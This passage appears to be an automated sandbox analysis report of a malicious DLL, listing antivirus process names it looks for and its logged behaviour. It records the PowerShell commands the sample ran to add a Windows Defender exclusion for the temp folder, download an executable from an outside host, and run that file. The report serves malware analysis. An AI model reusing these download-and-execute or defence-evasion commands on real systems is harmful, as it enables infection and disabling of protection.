TETRAY.EXE,VIPREUI.EXE,SBAMSVC.EXE,SBAMTRAY.EXE,SBPIMSVC.EXE,BAVHM.EXE,BAVSVC.EXE,BAVTRAY.EXE,BAV.EXE,BAVWEBCLIENT.EXE,BAVUPDATER.EXE,MCSHIELDCCC.EXE,MCSHIELDRTM.EXE,MCSHIELDDS.EXE,MCS-UNINSTALL.EXE,SDSCAN.EXE,SDFSSVC.EXE,SDWELCOME.EXE,SDTRAY.EXE,UNTHREAT.EXE,UTSVC.EXE,FORTICLIENT.EXE,FCAPPDB.EXE,FCDBLOG.EXE,FCHELPER64.EXE,FMON.EXE,FORTIESNAC.EXE,FORTIPROXY.EXE,FORTISSLVPNDAEMON.EXE,FORTITRAY.EXE,FORTIFW.EXE,FORTICLIENT_DIAGNOSTIC_TOOL.EXE,AV_TASK.EXE,CERTREG.EXE,FILMSG.EXE,FILUP.EXE,FILWSCC.EXE,FILWSCC.EXE,PSVIEW.EXE,QUAMGR.EXE,QUAMGR.EXE,SCHMGR.EXE,SCHMGR.EXE,TWSSCAN.EXE,TWSSRV.EXE,USERREG.EXESEDEBUGPRIVILEGECOULD NOT SET SE_DEBUG_NAME PRIVILEGE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4456Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1028Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5147
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1607
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5020Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4718Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4272Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5475Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep count: 5147 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep count: 1607 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1340Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 672Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7056Thread sleep count: 5020 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7056Thread sleep count: 4718 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5096Thread sleep count: 4272 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep count: 5475 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep time: -21213755684765971s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 48 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 68 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 34 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 72 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 43 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 58 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 672Thread sleep count: 38 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 4256Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 2224Thread sleep count: 134 > 30
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 2224Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 2224Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 7384Thread sleep count: 117 > 30
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 7384Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\migration\wtr\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior
Source: 1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4.19.drBinary or memory string: "VMware V[
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\t5y6t5.exe C:\Users\user\AppData\Local\Temp/t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
